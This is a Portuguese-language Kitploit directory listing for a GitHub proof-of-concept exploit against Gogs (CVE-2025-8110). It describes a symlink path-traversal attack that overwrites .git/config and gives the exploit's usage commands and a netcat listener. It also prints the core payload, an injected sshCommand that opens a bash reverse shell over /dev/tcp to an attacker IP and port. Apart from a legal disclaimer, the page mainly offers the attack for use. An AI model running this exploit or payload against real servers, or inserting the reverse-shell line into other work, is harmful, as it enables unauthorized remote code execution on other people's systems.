Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8110 — Exploit de prova de conceito para CVE-2025-8110, uma vulnerabilidade de RCE no Gogs que explora path traversal via links simbólicos e injeção de sshCommand para entregar uma reverse shell. | Kitploit
Ferramentas/GitHubGitHub/ghxstsec/cve-2025-8110
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Exploit de prova de conceito para CVE-2025-8110, uma vulnerabilidade de RCE no Gogs que explora path traversal via links simbólicos e injeção de sshCommand para entregar uma reverse shell.

Ver Repositório
531há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit RCE no Gogs (CVE-2025-8110)

Python License Expertise

Uma Prova de Conceito (PoC) para CVE-2025-8110, uma vulnerabilidade crítica no Gogs que permite Execução Remota de Código (RCE) via manipulação de .git/config usando bypass de links simbólicos e injeção de sshCommand.

📖 Visão Geral

Este exploit visa uma falha de Path Traversal no gerenciamento de conteúdo da API do Gogs. Um usuário autenticado pode:

  1. Criar um repositório e enviar um link simbólico apontando para o .git/config interno.
  2. Usar a API para sobrescrever o arquivo de configuração alvo através do symlink.
  3. Injetar um sshCommand malicioso para executar um Reverse Shell quando o servidor realizar operações Git.

🚀 Funcionalidades

  • Fluxo Automatizado: Gerencia login, criação de repositório, implantação de symlink e envenenamento.
  • Codificação Robusta: Codifica automaticamente as credenciais em URL para lidar com caracteres especiais (ex.: !, @).
  • Saída Rica: Log de alta visibilidade usando a biblioteca Rich.

🛠 Pré-requisitos

  • Python 3.12+
  • Git instalado no sistema local.
  • Credenciais válidas na instância Gogs alvo.

📦 Instalação

  1. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

Instale as dependências:

root@kitploit:~
pip3 install -r requirements.txt

💻 Uso

Inicie seu listener:

root@kitploit:~
nc -lvnp 6666

Execute o exploit:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Argumentos:

ArgumentoDescrição
-u, --urlURL base da instância Gogs alvo (ex.: http://target.htb:3000).
-lh, --hostIP do atacante (LHOST) para onde o reverse shell se conectará.
-lp, --portPorta do Listener (LPORT) configurada na sua máquina.
-p, --passwordSenha para a conta pwnuser realizar a autenticação.
-x, --proxy(Opcional) Roteia o tráfego através de um proxy local (padrão: http://localhost:8080).

Núcleo da vulnerabilidade:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Quando o Gogs executa um comando Git que requer transporte de rede (como uma sincronização de mirror ou verificação de referência interna), ele invoca o sshCommand, acionando o reverse shell.

⚠️ Aviso Legal: Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizado. O autor não é responsável por qualquer uso indevido ou dano causado por este script. O acesso não autorizado a sistemas de computador é ilegal.

Baixar ferramenta